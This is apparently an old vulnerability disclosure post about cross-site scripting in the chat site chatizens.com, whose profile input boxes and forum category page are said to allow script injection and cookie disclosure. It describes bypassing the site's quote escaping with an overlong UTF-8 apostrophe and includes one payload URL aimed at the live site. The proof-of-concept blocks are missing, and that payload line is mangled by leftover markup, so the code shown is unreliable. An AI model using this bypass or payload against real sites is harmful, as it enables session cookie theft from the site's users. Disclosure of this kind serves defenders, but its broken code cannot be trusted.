|
Chatizens.com Also known as Chattown.com=0D
=0D
Homepage:=0D
http://www.chatizens.com=0D
=0D
Affected files:=0D
=0D
* Profile input boxes:=0D
=0D
All input boxes of your profile.=0D
=0D
* Browsing the forums=0D
--------------------------------------------=0D
=0D
XSS vuln with cookie disclosure via profile input boxes.=0D
=0D
To bypass chatizens filters of adding backslashes to ' and ", we use the long UFT-8 unicode of '. PoC:=0D
=0D
=0D
=0D
And to display our cookie:=0D
=0D
=0D
=0D
Screenshot:=0D
http://www.youfucktard.com/xsp/chatizen1.jpg=0D
http://www.youfucktard.com/xsp/chatizen2.jpg=0D
=0D
---------------------------------------------=0D
heh, it seems chatizens.com is using a webapp I auditing before, Alstrasoft E-Friends. =0D
=0D
Screenshot:=0D
http://www.youfucktard.com/xsp/chatizen3.jpg=0D
=0D
-------------------------------------------=0D
=0D
XSS vuln via viewing forum categories:=0D
=0D
">">'><""><'<"=0D">http://chatizens.com/friends/index.php?mode=forums&act=viewcat&seid=19">">">'><""><'<"=0D
=0D
Screenshot:=0D
http://www.youfucktard.com/xsp/chatizen4.jpg=0D